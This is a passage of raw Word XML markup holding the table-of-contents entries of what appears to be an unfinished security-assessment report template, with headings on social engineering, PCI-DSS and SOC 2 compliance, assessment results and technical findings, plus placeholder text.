              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="1476B6E1" w14:textId="66DD8E68">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645190">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Social Engineering</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645190 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="29528518" w14:textId="5270FB6C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645191">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5 Compliance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645191 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="5DC8BBC4" w14:textId="6ACEB20B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645192">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Standards Review</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645192 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="78D82411" w14:textId="27BEBB1D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645193">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="IBM Plex Sans"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.1 PCI-DSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645193 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="16ECA686" w14:textId="6BCAE033">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645194">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="IBM Plex Sans"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.2 SOC 2 Cybersecurity Compliance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645194 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="0FBD3062" w14:textId="6465E8A5">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645195">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Compliance Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645195 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="67F5E0F0" w14:textId="2A4E91AA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645196">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="IBM Plex Sans"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.1 PCI-DSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645196 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="5EC34003" w14:textId="3A5E4CB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645197">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="IBM Plex Sans"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.2 SOC 2 Cybersecurity Compliance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645197 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="037B915B" w14:textId="0D45B9A0">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645198">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5 Assessment Results</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645198 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="3683F081" w14:textId="321A40FD">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645199">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Key Strengths TODO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645199 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="7EAE5149" w14:textId="6D6F3D81">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645200">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Key Areas of Improvement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645200 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="00716837" w14:textId="70703646">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645201">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Technical Findings Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645201 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="19B7C1DA" w14:textId="62D3E9D7">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645202">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6 Technical Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645202 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="399480B1" w14:textId="14CD828B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645203">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1 Critical Findings (add high, mid, etc after generation)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645203 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="1119E9FF" w14:textId="04D4367F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645204">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="IBM Plex Sans"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="IBM Plex Sans"/>
                <w:noProof/>
              </w:rPr>
              <w:t>{title}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645204 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
